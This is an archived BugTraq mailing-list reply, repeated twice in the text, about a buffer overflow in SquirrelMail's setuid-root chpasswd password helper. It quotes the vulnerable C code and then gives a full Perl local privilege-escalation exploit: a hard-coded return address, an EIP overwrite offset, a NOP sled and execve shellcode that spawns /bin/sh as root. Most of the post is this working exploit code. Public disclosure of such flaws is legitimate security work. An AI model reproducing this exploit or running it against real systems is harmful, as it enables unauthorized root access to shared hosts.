BugTraq
Back to list
|
Post reply
Re: Squirrelmail Chpasswod bof
Apr 19 2004 06:15PM
rip overflow no
In-Reply-To: <20040417193848.GA31925 (at) piper.madduck (dot) net [email concealed]>
Hi
>> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?
Certainly, but i admire your courage to ask for such a simple one tho :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024
/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];
/* now let's up our privieledge without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");
/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]); /* heh */
sprintf(Old_pw,"%s",argv[2]); /* heh */
sprintf(New_pw,"%s",argv[3]); /* heh */
/* some humor */
if(!strcmp(User,"root")){
printf("The %s user cannot be edited for security reasons.\n",User);
return 4; //the root user cannot be edited for security reasons
}
/* .. snip .. */
strcpy(PUser,User); /* heh! */
/* we all see the problems here, no? */
<---snip--->
Some lame 5minute-code, should exploit the same thing Matias did:
<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account
# or something on the host, heh. this should be pretty selfexplanatory
# - rip
use strict;
my $ret = 0xbffff732; # ret, worked for me, prolly won't for you. change it.
my $length = 190; # buffer length for smashing without ruining it
my $eipdist = 144; # distance to overwrite eip
my $offset = 0; # offset
my $numnops = 10; # number of nops?
my $nop = "\x90"; # nop
my $pw = 'heh'; # random string, heh, 3 chars for current $ret
# dunno where this came from, it was just lying there.
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68".
"\x68\x2f\x2f\x62\x69\x89\xe3\x52".
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
sub generate_string($$$) {
my ($r, $o, $len) = @_;
my $buffer;
my $i;
my $new_ret = pack('l', ($r + $o));
for($i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
for($i = 0; $i < $numnops; ++$i) { $buffer .= $nop; }
$buffer .= $shellcode;
return $buffer;
}
if($ARGV[0]) { $offset = $ARGV[0]; }
print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";
my $evil = generate_string($ret, $offset ,$length);
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end---->
- rip
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Hi
>> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?
Certainly, but i admire your courage to ask for such a simple one tho :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024
/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];
/* now let's up our privieledge without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");
/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]); /* heh */
sprintf(Old_pw,"%s",argv[2]); /* heh */
sprintf(New_pw,"%s",argv[3]); /* heh */
/* some humor */
if(!strcmp(User,"root")){
printf("The %s user cannot be edited for security reasons.\n",User);
return 4; //the root user cannot be edited for security reasons
}
/* .. snip .. */
strcpy(PUser,User); /* heh! */
/* we all see the problems here, no? */
<---snip--->
Some lame 5minute-code, should exploit the same thing Matias did:
<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account
# or something on the host, heh. this should be pretty selfexplanatory
# - rip
use strict;
my $ret = 0xbffff732; # ret, worked for me, prolly won't for you. change it.
my $length = 190; # buffer length for smashing without ruining it
my $eipdist = 144; # distance to overwrite eip
my $offset = 0; # offset
my $numnops = 10; # number of nops?
my $nop = "\x90"; # nop
my $pw = 'heh'; # random string, heh, 3 chars for current $ret
# dunno where this came from, it was just lying there.
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68".
"\x68\x2f\x2f\x62\x69\x89\xe3\x52".
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
sub generate_string($$$) {
my ($r, $o, $len) = @_;
my $buffer;
my $i;
my $new_ret = pack('l', ($r + $o));
for($i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
for($i = 0; $i < $numnops; ++$i) { $buffer .= $nop; }
$buffer .= $shellcode;
return $buffer;
}
if($ARGV[0]) { $offset = $ARGV[0]; }
print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";
my $evil = generate_string($ret, $offset ,$length);
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end---->
- rip
[ reply ]